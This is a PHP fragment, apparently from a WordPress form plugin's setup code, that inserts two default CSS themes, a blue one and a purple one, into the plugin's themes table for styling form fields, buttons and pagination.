    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`id`, `title`, `css`, `default`) VALUES(1, \'Theme 01 blue\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #013D7C;\r\nborder-radius: 5px;\r\ncolor: #013D7C;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\ninput[type="radio"]\r\n{\r\nborder:none !important;\r\noutline:none !important;\r\n}\r\ninput[type="checkbox"]\r\n{\r\nborder:none !important;\r\noutline:none !important;\r\n}\r\na.ui-spinner-button\r\n{\r\nborder-radius:0px !important;\r\nbackground: none!important;\r\n}\r\n\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\n\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #000;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #8A8A8A !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px solid #000 !important;\r\npadding-left:10px;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n\r\n.sel-imul {\r\n	display: none;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 0px solid #D3D3D3;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/09/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/10/01/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\ncolor: #FFF;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 38px;\r\nline-height: 35px;\r\nbackground:url([SITE_ROOT]/images/10/next.png) no-repeat right #013D7C;\r\npadding: 0px 36px 0 20px;\r\nvertical-align: middle;\r\nfont-size: 18px;\r\nborder-top-right-radius: 7px;\r\nborder-bottom-right-radius: 7px;\r\n}\r\n.previous-page div.wdform-page-button {\r\ncolor: #A2A2A2;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 37px;\r\nline-height: 35px;\r\nbackground:url([SITE_ROOT]/images/09/previous.png) no-repeat left #F1F1F1;\r\npadding: 0 20px 0 36px;\r\nvertical-align: middle;\r\nfont-size: 18px;\r\nborder-top-left-radius: 7px;\r\nborder-bottom-left-radius: 7px;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #013D7C;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #FFFFFF;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #013D7C;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 10px 40px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #013D7C;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	padding: 2px;\r\n	height: 26px;\r\n	border: 1px solid #B7B7B7;\r\nbackground: #F8F8F8;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type="text"]:focus{\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\nselect {\r\n	outline: none;\r\n}\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n\r\n\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n\r\n\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #8A8A8A;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #013E7D;\r\nbackground-color: #FFF;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 29px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 16px;\r\nfont-weight:bold;\r\n}\r\n.page_active {\r\ncolor: #FFF;\r\ncursor: pointer;\r\nbackground-color: #013E7D;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 20px;\r\npadding: 5px 25px 0px 25px;\r\nline-height: 26px;\r\nfont-weight:bold;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nmargin: 0px;\r\nborder-spacing: 0px;\r\nheight: 16px;\r\nline-height: 16px;\r\nfont-size: 15px;\r\nfloat: left;\r\ntext-align: right !important;\r\nz-index: 1;\r\nposition: relative;\r\nvertical-align: middle;\r\nbackground: #013E7F;\r\ncolor: #fff;\r\nborder-top-left-radius: 5px;\r\nborder-bottom-left-radius: 5px;\r\n}\r\n.page_percentage_deactive {\r\nheight: 16px;\r\nline-height: 16px;\r\nbackground-color: #F1F1F1;\r\ntext-align: left !important;\r\nmargin-bottom: 1px;\r\nborder-radius: 5px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n}\r\n\r\n.wdform_percentage_text {\r\nmargin: 3px 5px 3px 9px;\r\ncolor: #FFF;\r\nfont-size: 12px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #6E6E6E;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 27px;\r\n	height: 27px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`id`, `title`, `css`, `default`) VALUES(2, \'Theme 01 purple\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #6C005E;\r\nborder-radius: 5px;\r\ncolor: #6C005E;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\ninput[type="radio"]\r\n{\r\nborder:none !important;\r\noutline:none !important;\r\n}\r\ninput[type="checkbox"]\r\n{\r\nborder:none !important;\r\noutline:none !important;\r\n}\r\na.ui-spinner-button\r\n{\r\nborder-radius:0px !important;\r\nbackground: none!important;\r\n}\r\n\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\n\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #000;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #8A8A8A !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px solid #000 !important;\r\npadding-left:10px;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n\r\n.sel-imul {\r\n	display: none;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 0px solid #D3D3D3;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/09/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/10/02/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\ncolor: #FFF;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 38px;\r\nline-height: 35px;\r\nbackground:url([SITE_ROOT]/images/10/next.png) no-repeat right #6C005E;\r\npadding: 0px 36px 0 20px;\r\nvertical-align: middle;\r\nfont-size: 18px;\r\nborder-top-right-radius: 7px;\r\nborder-bottom-right-radius: 7px;\r\n}\r\n.previous-page div.wdform-page-button {\r\ncolor: #A2A2A2;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 37px;\r\nline-height: 35px;\r\nbackground:url([SITE_ROOT]/images/09/previous.png) no-repeat left #F1F1F1;\r\npadding: 0 20px 0 36px;\r\nvertical-align: middle;\r\nfont-size: 18px;\r\nborder-top-left-radius: 7px;\r\nborder-bottom-left-radius: 7px;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #6C005E;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #FFFFFF;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #6C005E;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 10px 40px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #6C005E;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	padding: 2px;\r\n	height: 26px;\r\n	border: 1px solid #B7B7B7;\r\nbackground: #F8F8F8;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type="text"]:focus{\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\nselect {\r\n	outline: none;\r\n}\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n\r\n\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n\r\n\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #8A8A8A;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #6C005E;\r\nbackground-color: #FFF;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 29px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 16px;\r\nfont-weight:bold;\r\n}\r\n.page_active {\r\ncolor: #FFF;\r\ncursor: pointer;\r\nbackground-color: #6C005E;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 20px;\r\npadding: 5px 25px 0px 25px;\r\nline-height: 26px;\r\nfont-weight:bold;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nmargin: 0px;\r\nborder-spacing: 0px;\r\nheight: 16px;\r\nline-height: 16px;\r\nfont-size: 15px;\r\nfloat: left;\r\ntext-align: right !important;\r\nz-index: 1;\r\nposition: relative;\r\nvertical-align: middle;\r\nbackground: #6C005E;\r\ncolor: #fff;\r\nborder-top-left-radius: 5px;\r\nborder-bottom-left-radius: 5px;\r\n}\r\n.page_percentage_deactive {\r\nheight: 16px;\r\nline-height: 16px;\r\nbackground-color: #F1F1F1;\r\ntext-align: left !important;\r\nmargin-bottom: 1px;\r\nborder-radius: 5px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n}\r\n\r\n.wdform_percentage_text {\r\nmargin: 3px 5px 3px 9px;\r\ncolor: #FFF;\r\nfont-size: 12px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #6E6E6E;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 27px;\r\n	height: 27px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\', 0)');
